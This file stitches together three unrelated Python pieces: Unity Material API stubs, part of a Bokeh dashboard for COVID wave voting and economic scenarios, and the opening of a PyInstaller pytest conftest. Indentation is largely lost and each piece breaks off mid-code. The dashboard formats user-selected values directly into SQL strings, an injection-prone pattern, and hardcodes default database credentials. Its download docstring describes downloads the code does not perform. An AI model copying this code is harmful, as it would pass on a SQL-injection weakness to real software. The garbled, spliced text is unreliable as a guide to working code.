:returns: Vector2
:rtype: UnityEngine.Vector2
'''
pass
@staticmethod
@overload
def GetTextureScale(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Vector2
:rtype: UnityEngine.Vector2
'''
pass
@staticmethod
def GetTextureScale(arg1=None):
pass
@staticmethod
@overload
def SetFloat(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Single
:type arg2: System.Single or float
'''
pass
@staticmethod
@overload
def SetFloat(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Single
:type arg2: System.Single or float
'''
pass
@staticmethod
def SetFloat(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetInt(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Int32
:type arg2: System.Int32 or int
'''
pass
@staticmethod
@overload
def SetInt(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Int32
:type arg2: System.Int32 or int
'''
pass
@staticmethod
def SetInt(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetColor(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Color
:type arg2: UnityEngine.Color
'''
pass
@staticmethod
@overload
def SetColor(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Color
:type arg2: UnityEngine.Color
'''
pass
@staticmethod
def SetColor(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetVector(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Vector4
:type arg2: UnityEngine.Vector4
'''
pass
@staticmethod
@overload
def SetVector(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Vector4
:type arg2: UnityEngine.Vector4
'''
pass
@staticmethod
def SetVector(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetMatrix(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Matrix4x4
:type arg2: UnityEngine.Matrix4x4
'''
pass
@staticmethod
@overload
def SetMatrix(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Matrix4x4
:type arg2: UnityEngine.Matrix4x4
'''
pass
@staticmethod
def SetMatrix(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetTexture(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Texture
:type arg2: UnityEngine.Texture
'''
pass
@staticmethod
@overload
def SetTexture(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Texture
:type arg2: UnityEngine.Texture
'''
pass
@staticmethod
def SetTexture(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetBuffer(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: ComputeBuffer
:type arg2: UnityEngine.ComputeBuffer
'''
pass
@staticmethod
@overload
def SetBuffer(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: ComputeBuffer
:type arg2: UnityEngine.ComputeBuffer
'''
pass
@staticmethod
def SetBuffer(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetFloatArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetFloatArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetFloatArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: SingleArray
:type arg2: System.SingleArray
'''
pass
@staticmethod
@overload
def SetFloatArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: SingleArray
:type arg2: System.SingleArray
'''
pass
@staticmethod
def SetFloatArray(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetColorArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetColorArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetColorArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: ColorArray
:type arg2: UnityEngine.ColorArray
'''
pass
@staticmethod
@overload
def SetColorArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: ColorArray
:type arg2: UnityEngine.ColorArray
'''
pass
@staticmethod
def SetColorArray(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetVectorArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetVectorArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetVectorArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Vector4Array
:type arg2: UnityEngine.Vector4Array
'''
pass
@staticmethod
@overload
def SetVectorArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Vector4Array
:type arg2: UnityEngine.Vector4Array
'''
pass
@staticmethod
def SetVectorArray(arg1=None, arg2=None):
pass
@staticmethod
@overload
def SetMatrixArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetMatrixArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Undefined variable
:type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList
'''
pass
@staticmethod
@overload
def SetMatrixArray(arg1, arg2):
'''
:param arg1: String
:type arg1: System.String or str
:param arg2: Matrix4x4Array
:type arg2: UnityEngine.Matrix4x4Array
'''
pass
@staticmethod
@overload
def SetMatrixArray(arg1, arg2):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:param arg2: Matrix4x4Array
:type arg2: UnityEngine.Matrix4x4Array
'''
pass
@staticmethod
def SetMatrixArray(arg1=None, arg2=None):
pass
@staticmethod
@overload
def GetFloat(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Single
:rtype: System.Single
'''
pass
@staticmethod
@overload
def GetFloat(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Single
:rtype: System.Single
'''
pass
@staticmethod
def GetFloat(arg1=None):
pass
@staticmethod
@overload
def GetInt(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
@overload
def GetInt(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def GetInt(arg1=None):
pass
@staticmethod
@overload
def GetColor(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Color
:rtype: UnityEngine.Color
'''
pass
@staticmethod
@overload
def GetColor(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Color
:rtype: UnityEngine.Color
'''
pass
@staticmethod
def GetColor(arg1=None):
pass
@staticmethod
@overload
def GetVector(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Vector4
:rtype: UnityEngine.Vector4
'''
pass
@staticmethod
@overload
def GetVector(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Vector4
:rtype: UnityEngine.Vector4
'''
pass
@staticmethod
def GetVector(arg1=None):
pass
@staticmethod
@overload
def GetMatrix(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Matrix4x4
:rtype: UnityEngine.Matrix4x4
'''
pass
@staticmethod
@overload
def GetMatrix(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Matrix4x4
:rtype: UnityEngine.Matrix4x4
'''
pass
@staticmethod
def GetMatrix(arg1=None):
pass
@staticmethod
@overload
def GetTexture(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Texture
:rtype: UnityEngine.Texture
'''
pass
@staticmethod
@overload
def GetTexture(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
:returns: Texture
:rtype: UnityEngine.Texture
'''
pass
@staticmethod
def GetTexture(arg1=None):
pass
@staticmethod
@overload
def GetFloatArray(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: SingleArray
:rtype: System.SingleArray
'''
pass
@staticmethod
@overload
def GetFloatArray(arg1):
'''
:param arg1: Int32
        :type arg1: System.Int32 or int
        :returns: SingleArray
        :rtype: System.SingleArray
        '''
        pass
self.p_hmap,
self.p_oxcluster,
self.p_gumbel,
self.p_votes,
row([Div(text='<div class="horizontalgap" style="width:200px"><h2>Statistics</h2></div>'),
self.p_histogram_wave,self.p_histogram_calm,self.p_duration_heatmap]),
]),
column([self.user_id,
self.voting_table,
self.gumbel_choices,
self.help_text]),
]))
def check_and_create_reference_data(self):
if not self.engine.dialect.has_table(self.engine,"johns_hopkins_country_mapping"):
conn = self.engine.connect()
self.dfMapping = pd.read_csv("https://github.com/rolls-royce/EMER2GENT/raw/master/data/sun/geo/country_name_mapping.csv",low_memory=False)
self.dfMapping.to_sql("johns_hopkins_country_mapping", conn, if_exists='replace',dtype={'ADM0_A3':sqlalchemy.types.String(3),
'name':sqlalchemy.types.String(150),
'ISO_3_code_i':sqlalchemy.types.Integer},index=False)
#print(dfMapping)
conn.close()
"""if not self.engine.dialect.has_table(self.engine,"un_population_data_2020_estimates"):
conn = self.engine.connect()
dfPopulationRaw = pd.read_excel("https://population.un.org/wpp/Download/Files/1_Indicators%20(Standard)/EXCEL_FILES/1_Population/WPP2019_POP_F01_1_TOTAL_POPULATION_BOTH_SEXES.xlsx",
sheet_name="ESTIMATES",skiprows=16,usecols="E,BZ")
alldata = []
for i,row in dfPopulationRaw.iterrows():
try:
result = pycountry.countries.get(numeric="{:03d}".format(row["Country code"]))
except:
print(row["Country code"],end="..")
continue
if result:
alldata.append({"ADM0_A3":result.alpha_3,"population":row["2020"]*1000,"name":result.name})
else:
try:
result = pycountry.countries.search_fuzzy(row["Region, subregion, country or area *"])
print(row["Country code"],result,end="..")
alldata.append({"ADM0_A3":result.alpha_3,"population":round(row["2020"]*1000),"name":result.name})
except:
continue
self.dfPopulation = pd.DataFrame(alldata)
self.dfPopulation.to_sql("un_population_data_2020_estimates", conn, if_exists='replace',dtype={'ADM0_A3':sqlalchemy.types.String(3),
'name':sqlalchemy.types.String(150),
'ISO_3_code_i':sqlalchemy.types.Integer},index=False)
#print(dfPopulation)
conn.close()"""
def download_data(self):
"""This downloads directly, from github, the Johns Hopkins and Oxford university data sets. Not error handling is performed
as it is unclear as to how to proceed in these cases (and no existing data would be overwritten)
Note this code still contains progress bar code which will not cause visual feedback, as this code
is called during a callback handling routine which prevents GUI updates. I left it in as this could change
in a future version breaking the agile rule of no provision for future growth and the sensible rule
of not having untested code.
"""
print("check_and_create_reference_data")
self.check_and_create_reference_data()
conn = self.engine.connect()
print("Finished download")
def process_data(self):
"""The heavy lifting of processing the infection numbers of Johns Hopkins and the OxCGRT data.
"""
        # This looks like a duplicate
# TODO: cleanup
pass
def compute_data_status(self):
"""Determine if data are stale, or don't even exist. Staleness is determined by a "last download" item.
"""
#if not self.engine.dialect.has_table(self.engine,"johns_hopkins_data"):
# self.data_status = "no_data"
# message_text = "Could not find data file, press Load Data"
# color = "#FFi0000"
#else:
try:
conn = self.engine.connect()
result = conn.execute("SELECT MAX(datetime_date) FROM cookiecutter_case_data")
latest_datapoint = result.fetchone()[0]
data_age = datetime.datetime.now()-pd.to_datetime(latest_datapoint)
if data_age.days > 2:
self.data_status = "stale"
message_text = "Your data are {:.1f} days old, consider reloading it".format(data_age.days+data_age.seconds/86400)
color = "darkorange"
else:
self.data_status = "current"
message_text = "You have current data, which are {:.1f} days old".format(data_age.days+data_age.seconds/86400)
color = "limegreen"
except:
self.data_status = "no_data"
message_text = "Could not find data file, press Load Data"
color = "tomato"
"""datafile = "data/datafile.pckld.gz"
if os.path.exists(datafile):
with gzip.open(datafile,"rb") as f:
self.blob = json.loads(f.read())
data_age = datetime.datetime.now()-pd.to_datetime(self.blob["last_update"])
if data_age.days > 1:
self.data_status = "stale"
message_text = "Your data are {:.1f} days old, consider reloading it".format(data_age.days+data_age.seconds/86400)
color = "#FFBF00"
else:
self.data_status = "current"
message_text = "You have current data, which are {:.1f} days old".format(data_age.days+data_age.seconds/86400)
color = "#00FF00"
else:
self.data_status = "no_data"
message_text = "Could not find data file, press Load Data"
color = "#FFi0000"
"""
self.progress_bar_info_message.text = message_text
self.progress_bar_data.data["color"] = [color]
def sort_countries_by_relevance(self):
"""Work in progress on how to display the countries in a relevant oder in the dropdown. Alphabetically may cause only the countries A-G to
ever be voted on.... Here we use the relative percentage growth of infections compared to a week ago.
"""
### TODO this code would not work anymore
#score = {}
#for country in self.country_select.options:
# score[country] = self.adfCountryData[country].infection_rate_7.values[-1]
#score_sorted = {k: v for k, v in sorted(score.items(), key=lambda item: item[1],reverse=True)}
#self.country_select.options = list(score_sorted.keys())
print("SORTED")
def load_data(self):
"""Loading the data but also, as a temprary fix, checking which user files can be found in cookiecutter/data/*.csv
TODO: The latter needs to be ported to SQL
"""
print(self.data_status)
if self.data_status == "no_data":
self.dfVotesContent = pd.DataFrame()
return
else:
conn = self.engine.connect()
df = pd.read_sql("select distinct data_source from cookiecutter_case_data;",conn)
self.dataset_select.options = sorted(df.data_source.values)
self.dataset_select.value = "Johns Hopkins global"
print("DATASETS {}".format(self.dataset_select.options ))
df = pd.read_sql("SELECT DISTINCT name FROM cookiecutter_case_data WHERE data_source='Johns Hopkins global' ORDER BY name;",conn)
self.country_select.options = list(df.name.values)
sql_query = "SELECT name,identifier,count(CASE WHEN kind='begin' THEN kind END) as waves, count(CASE WHEN kind='end' THEN kind END) as episodes, count(*) from cookiecutter_computed_waves_chgpoint GROUP BY name,cookiecutter_computed_waves_chgpoint.identifier"
dfWaves = pd.read_sql(sql_query,conn)
try:
sql_query = "SELECT count(r.identifier) as votes,r.identifier FROM (SELECT identifier FROM cookiecutter_verdicts GROUP BY vote_id,identifier) as r GROUP BY r.identifier;"
dfVotes = pd.read_sql(sql_query,conn)
except:
dfVotes=pd.DataFrame({"identifier":[],"votes":[],"count":[]})
dfVotesContent = dfWaves.merge(dfVotes,on="identifier",how="outer").fillna(0)
dfVotesContent.votes = dfVotesContent.votes.astype(int)
dfVotesContent["need_vote"] = dfVotesContent.waves+dfVotesContent.episodes > dfVotesContent.votes
dfVotesContent["count"] = dfVotesContent.waves+dfVotesContent.episodes
dfVotesContent = dfVotesContent.sort_values("count",ascending=False)
if len(dfVotesContent)>0:
self.cds_votes.data = {"name":dfVotesContent.name.values,
"waves":dfVotesContent.waves.values,
"episodes":dfVotesContent.episodes.values,
"votes":dfVotesContent.votes.values,
"need_vote":dfVotesContent.need_vote.values}
else:
self.cds_votes.data = {"name":[],
"waves":[],
"episodes":[],
"votes":[],
"need_vote":[]}
self.compute_metrics()
#self.country_select.value = "Germany"
self.cds.selected.on_change('indices',self.on_selection_change_callback)
pass
class GUIEconomy():
def __init__(self):
self.theme = THEME()
self.data_status = "no_data" # "stale", "current"
if "SQL_CONNECT" not in list(os.environ.keys()):
sql_url = "postgresql://cookiecutter:cookiecutter@database:5432/cookiec"
else:
sql_url = os.environ["SQL_CONNECT"]
#print("SQL_CONNECT {}".format(sql_url))
self.engine = create_engine(sql_url, pool_size=10, max_overflow=20)
print(self.engine)
self.add_point_guard = False
pass
def change_category(self,attr,old,new):
#print(old,new)
self.get_keys(category=new)
if self.key_select.disabled:
self.key_select.value = ""
else:
self.key_select.value = self.key_select.options[0]
#print(self.key_select.options)
def get_categories(self):
conn = self.engine.connect()
categories = []
try:
result = conn.execute("SELECT DISTINCT category FROM economic_indicators;")
categories.extend([c[0] for c in result.fetchall()])
conn.close()
except:
pass
#print(categories)
self.category_select.options=categories
self.cds_proxy_data.data = {"datetime":[],"value":[]}
def change_key(self,attr,old,new):
if len(new) <= 0:
print("Zero length key")
return
else:
print("CHANGE KEY TO ",new)
category = self.category_select.value
key = new
conn = self.engine.connect()
sql_query = "SELECT datetime_date,parameter_value FROM economic_indicators WHERE category='{}' and parameter_name='{}' ORDER BY datetime_date;".format(category,key)
df = pd.read_sql(sql_query,conn)
print("CHANGE_KEY from '{}' to '{}'".format(old,new))
print(sql_query)
#print(df)
self.cds_proxy_data.data = {"datetime":df["datetime_date"].values,"value":df["parameter_value"].values}
self.p_values.title.text = "{} - {}".format(category,key)
self.p_values.x_range=DataRange1d(pd.to_datetime(self.start_date.value).date(),pd.to_datetime(self.end_date.value).date())
#self.value_axis.bounds=DataRange1d(df.value.min(),df.value.max())
value_range = df["parameter_value"].max()-df["parameter_value"].min()
self.p_values.extra_y_ranges["value"].start = df["parameter_value"].min()-value_range*0.05
self.p_values.extra_y_ranges["value"].end = df["parameter_value"].max()+value_range*0.05
self.p_values.yaxis[1].axis_label = new
df = pd.read_sql("SELECT DISTINCT explanation,explanation_text FROM economic_indicators WHERE category='{}' and parameter_name='{}';".format(category,key),conn)
conn.close()
url_shown = df["explanation"].values[0]
url = "https://translate.google.com/translate?hl=en&sl=auto&tl=en&u={}".format(urllib.parse.quote_plus(url_shown))
self.explanation.text="<H1>{}</H1><H2>{}</H2>See <A HREF=\"{}\" style=\"color:#DDDDDD;\">{}</A> for more details".format(category,key,url,url_shown)
self.explanation_text.text = df["explanation_text"].values[0]
def get_keys(self,category=""):
if category == "":
category = self.category_select.value
conn = self.engine.connect()
result = conn.execute("SELECT DISTINCT parameter_name FROM economic_indicators WHERE category='{}' ORDER BY parameter_name;".format(category))
keys = []
keys.extend([k[0] for k in result.fetchall()])
#print("KEYS {}".format(keys))
conn.close()
if len(keys) <= 0:
self.key_select.options=["<select catgory first>"]
#self.key_select.value=["<select catgory first>"]
self.key_select.disabled = True
else:
self.key_select.options = keys
self.key_select.disabled = False
def load_data(self):
if "TSAPAX" in self.category_select.options:
self.category_select.value = "TSAPAX"
#print('self.change_category(None,"","TSAPAX")')
else:
self.category_select.value = ""
#print('self.change_category(None,"","")')
## self.category_select.value = "TSAPAX"
#self.change_category(None,"","TSAPAX")
if "PERCENTAGE" in self.key_select.options:
self.key_select.value = "PERCENTAGE"
#print('self.key_select.value = "PERCENTAGE"')
else:
self.key_select.value = ""
#print('self.key_select.value = ""')
## self.key_select.value = "PERCENTAGE"
conn = self.engine.connect()
try:
ddf = pd.read_sql("SELECT DISTINCT name FROM input_output_tables",conn)
regions = sorted(ddf.name.values)
except:
regions = ["Global","Europe","National"]
self.scenario_region.options = regions
self.scenario_region.value = regions
try:
ddf = pd.read_sql("SELECT DISTINCT row_sector FROM input_output_tables",conn)
sectors = sorted(ddf.row_sector.values)
except:
sectors = sorted(["Air Transport","Hotel","Finance","Industry","Sales","Services"])
self.scenario_sector.options = sectors
self.scenario_sector.value = [random.choice(sectors)]
conn.close()
def add_point(self,attr,old,new):
if self.add_point_guard:
return
self.add_point_guard = True
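# Assigning cds_drawn_polyline.data below fires this callback again; the guard above breaks the recursion.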
ddf = pd.DataFrame(new)
#if pd.Index(ddf["datetime"]).is_monotonic:
# return
ddf = ddf.sort_values("datetime").reset_index()
del ddf["index"]
ddf["coloridx"] = -1
ddf["class"] = "shock"
ddf.at[ddf[ddf["value"].diff(1)>0].index.min():,"coloridx"]=1
ddf.at[ddf[ddf["value"].diff(1)>0].index.min():,"class"]="recovery"
#print(ddf)
self.cds_drawn_polyline.data = {"datetime":ddf.datetime.values,"value":ddf.value.values,"coloridx":ddf.coloridx.values,"class":ddf["class"].values}
#print(self.cds_drawn_polyline.data)
self.add_point_guard = False
self.clear_drawing.disabled = False
def save_scenario_callback(self,event):
df = self.cds_drawn_polyline.to_df()
df["user_id"] = self.user_id.value
df["datetime_vote"] = datetime.datetime.now()
df["scenario_name"] = self.scenario_name.value
df["category"] = self.category_select.value
df["parameter_name"] = self.key_select.value
df = df.rename(columns={"value":"parameter_value","datetime":"datetime_date","class":"shock_recovery"}) # db2 does not like value in SQL statements
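# Bokeh stores datetimes as milliseconds since the epoch; multiplying by 1E6 yields nanoseconds, the default unit pd.to_datetime expects.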
df["datetime_date"] = pd.to_datetime(df["datetime_date"]*1E6)
df.to_csv("doobee.csv",index=False)
conn = self.engine.connect()
df.to_sql("cookiecutter_scenarios",conn,if_exists="append",dtype={'user_id':sqlalchemy.types.String(50),
'datetime_vote': sqlalchemy.types.DateTime,
'scenario_name':sqlalchemy.types.String(100),
'category':sqlalchemy.types.String(100),
'datetime_date': sqlalchemy.types.DateTime,
'shock_recovery':sqlalchemy.types.String(20),
'parameter_name':sqlalchemy.types.String(100),
'parameter_value':sqlalchemy.types.Float },index=False)
conn.close()
pass
def clear_drawing_callback(self,event):
self.cds_drawn_polyline.data = {"datetime":[],"value":[],"coloridx":[],"class":[]}
def delete_selected_point_callback(self,event):
data = self.cds_drawn_polyline.data
newdata = {}
for k in data.keys():
newdata[k] = [i for j, i in enumerate(data[k]) if j not in self.cds_drawn_polyline.selected.indices] # https://stackoverflow.com/questions/497426/deleting-multiple-elements-from-a-list
self.cds_drawn_polyline.selected.indices = []
self.cds_drawn_polyline.data = newdata
def drawn_polyline_selection_change_callback(self,attr,old,new):
print("drawn_polyline_selection_change_callback old {} new {}".format(old,new))
if len(new)>0:
self.delete_selected_point.disabled = False
else:
self.delete_selected_point.disabled = True
pass
def scenario_name_callback(self,attr,old,new): #################
print("SCENARIO_NAME_CALLBACK",old,new)
if len(new)>0:
self.save_scenario.disabled = False
else:
self.save_scenario.disabled = True
def create(self):
self.cds_proxy_data = ColumnDataSource(pd.DataFrame({"datetime":[],"value":[]}))
self.cds_drawn_polyline = ColumnDataSource({"datetime":[],"value":[],"coloridx":[],"class":[]})
self.heading = Div(text="<H1>Economic Data</H1>")
self.category_select = Select(title="Category",options=[""])
self.get_categories()
self.category_select.value = ""
self.key_select = Select(title="Key",options=[""])
self.start_date = DatePicker(title="Start Date",value=pd.to_datetime("2020-01-01").date())
self.end_date = DatePicker(title="End Date",value=datetime.date.today())
self.p_values = figure(plot_width=1200, plot_height=400,x_axis_type='datetime',title="",
y_range=(0,1.05),
tools="pan,box_zoom,box_select,reset", #active_drag="point_draw",
#output_backend="webgl"
)
self.p_values.extra_y_ranges = {"value":Range1d()}
self.p_values = self.theme.apply_theme_defaults(self.p_values)
self.p_values.background_fill_color = "#ffffff"
self.p_values.line(x="datetime",y="value",source=self.cds_proxy_data,y_range_name="value")
#self.value_axis = LinearAxis(y_range_name="value")
self.p_values.add_layout(LinearAxis(y_range_name="value",
axis_label_text_color=self.theme.text_color,
major_label_text_color=self.theme.text_color,
axis_line_color=self.theme.plot_color), 'right')
editor = self.p_values.line(x="datetime",y="value",source=self.cds_drawn_polyline,line_color="darkgrey",line_width=3)
mapper = linear_cmap(field_name="coloridx",palette=["tomato","grey","seagreen"],low=-1,high=1)
self.p_values.circle(x="datetime",y="value",source=self.cds_drawn_polyline,size=25,fill_color=mapper)#,fill_color="color",size=25)
draw_tool = PointDrawTool(renderers=[editor], empty_value='black')
self.p_values.add_tools(draw_tool)
self.p_values.toolbar.active_tap = draw_tool
columns = [TableColumn(field="datetime", title="Datetime", formatter=DateFormatter(),width=100),
TableColumn(field="value", title="Value",formatter=NumberFormatter(format="0.00"), width=100),
TableColumn(field="class", title="Shock/Recovery", width=100)]
self.proxy_table = DataTable(source=self.cds_drawn_polyline, columns=columns, editable=True, height=500,selectable='checkbox',index_position=None)
self.user_id = TextInput(value="nobody@{}".format(socket.gethostname()),title="Name to save your results")
regions = []
self.scenario_region = MultiChoice(title="Region the scenario applies to",options=regions,value=regions)
sectors = []
self.scenario_sector = MultiChoice(title="Sector the scenario applies to",options=sectors,value=sectors,width=400)
dummy_text = "Scenario {:%Y-%m-%d %H:%M} using ".format(datetime.datetime.now())
self.scenario_name = TextInput(title="Title to save your scenario",value=dummy_text)# Only
#-----------------------------------------------------------------------------
# Copyright (c) 2005-2020, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
# Imports
# =======
# Library imports
# ---------------
import copy
import glob
import os
import pytest
import re
import subprocess
import sys
import inspect
import textwrap
import io
import shutil
from contextlib import suppress
# Third-party imports
# -------------------
import py
import psutil # Manages subprocess timeout.
# Set a handler for the root-logger to inhibit 'basicConfig()' (called in
# PyInstaller.log) from setting up a stream handler writing to stderr. This
# avoids log messages being written (and captured) twice: once on stderr and
# once by pytest's caplog.
import logging
logging.getLogger().addHandler(logging.NullHandler())
# Local imports
# -------------
# Expand sys.path with PyInstaller source.
_ROOT_DIR = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..'))
sys.path.append(_ROOT_DIR)
from PyInstaller import configure, config
from PyInstaller import __main__ as pyi_main
from PyInstaller.utils.tests import gen_sourcefile
from PyInstaller.utils.cliutils import archive_viewer
from PyInstaller.compat import is_darwin, is_win, safe_repr, \
architecture, is_linux, text_read_mode
from PyInstaller.depend.analysis import initialize_modgraph
from PyInstaller.utils.win32 import winutils
from PyInstaller.utils.hooks.qt import pyqt5_library_info, pyside2_library_info
# Globals
# =======
# Timeout for running the executable. If the executable does not exit within
# this time, it is interpreted as a test failure.
_EXE_TIMEOUT = 30 # In sec.
# Number of retries we should attempt if the executable times out.
_MAX_RETRIES = 2
# All currently supported platforms
SUPPORTED_OSES = {"darwin", "linux", "win32"}
# Code
# ====
# Fixtures
# --------
@pytest.fixture
def SPEC_DIR(request):
"""Return the directory where the test spec-files reside"""
return py.path.local(_get_spec_dir(request))
@pytest.fixture
def SCRIPT_DIR(request):
"""Return the directory where the test scripts reside"""
return py.path.local(_get_script_dir(request))
def pytest_runtest_setup(item):
"""Markers to skip tests based on the current platform.
https://pytest.org/en/stable/example/markers.html#marking-platform-specific-tests-with-pytest
Available markers: see setup.cfg [tool:pytest] markers
- @pytest.mark.darwin (macOS)
- @pytest.mark.linux (GNU/Linux)
- @pytest.mark.win32 (Windows)
"""
supported_platforms = SUPPORTED_OSES.intersection(
mark.name for mark in item.iter_markers())
plat = sys.platform
if supported_platforms and plat not in supported_platforms:
pytest.skip("only runs on %s" % plat)
@pytest.hookimpl(tryfirst=True, hookwrapper=True)
def pytest_runtest_makereport(item, call):
# execute all other hooks to obtain the report object
outcome = yield
rep = outcome.get_result()
# set a report attribute for each phase of a call, which can
# be "setup", "call", "teardown"
setattr(item, "rep_" + rep.when, rep)
# Return the base directory which contains the current test module.
def _get_base_dir(request):
return os.path.dirname(os.path.abspath(request.fspath.strpath))
# Directory with Python scripts for functional tests. E.g. main scripts, etc.
def _get_script_dir(request):
return os.path.join(_get_base_dir(request), 'scripts')
# Directory with testing modules used in some tests.
def _get_modules_dir(request):
return os.path.join(_get_base_dir(request), 'modules')
# Directory with .toc log files.
def _get_logs_dir(request):
return os.path.join(_get_base_dir(request), 'logs')
# Return the directory where data for tests is located.
def _get_data_dir(request):
return os.path.join(_get_base_dir(request), 'data')
# Directory with .spec files used in some tests.
def _get_spec_dir(request):
return os.path.join(_get_base_dir(request), 'specs')
@pytest.fixture
def script_dir(request):
return py.path.local(_get_script_dir(request))
# A helper function to copy from data/dir to tmpdir/data.
def _data_dir_copy(
# The pytest request object.
request,
# The name of the subdirectory located in data/name to copy.
subdir_name,
# The tmpdir object for this test. See
# https://pytest.org/latest/tmpdir.html.
tmpdir
):
# Form the source and tmp paths.
source_data_dir = py.path.local(_get_data_dir(request)).join(subdir_name)
tmp_data_dir = tmpdir.join('data', subdir_name)
# Copy the data.
shutil.copytree(source_data_dir.strpath, tmp_data_dir.strpath)
# Return the temporary data directory, so that the copied data can now be
# used.
return tmp_data_dir
# Define a fixture for the DataDir object.
@pytest.fixture
def data_dir(
# The request object for this test. See
# https://pytest.org/latest/builtin.html#_pytest.python.FixtureRequest
# and
# https://pytest.org/latest/fixture.html#fixtures-can-introspect-the-requesting-test-context.
request,
# The tmpdir object for this test. See
# https://pytest.org/latest/tmpdir.html.
tmpdir):
# Strip the leading 'test_' from the test's name.
name = request.function.__name__[5:]
# Copy to tmpdir and return the path.
return _data_dir_copy(request, name, tmpdir)
class AppBuilder(object):
def __init__(self, tmpdir, request, bundle_mode):
self._tmpdir = tmpdir
self._request = request
self._mode = bundle_mode
self._specdir = str(tmpdir)
self._distdir = str(tmpdir / 'dist')
self._builddir = str(tmpdir /'build')
def test_spec(self, specfile, *args, **kwargs):
"""
Test a Python script that is referenced in the supplied .spec file.
"""
__tracebackhide__ = True
specfile = os.path.join(_get_spec_dir(self._request), specfile)
# 'test_script' should handle .spec properly as script.
return self.test_script(specfile, *args, **kwargs)
def test_source(self, source, *args, **kwargs):
"""
Test a Python script given as source code.
The source will be written into a file named like the
test-function. This file will then be passed to `test_script`.
If you need another related file, e.g. a `.toc`-file for
testing the content, put it at the normal place. Just be sure
to take the basename from the test-function's name.
:param source: Source code to create executable from. This
will be saved into a temporary file which is
then passed on to `test_script`.
:param test_id: Test-id for parametrized tests. If given, it
will be appended to the script filename,
separated by two underscores.
All other arguments are passed straight on to `test_script`.
Ensure that the caller of `test_source` is in a UTF-8
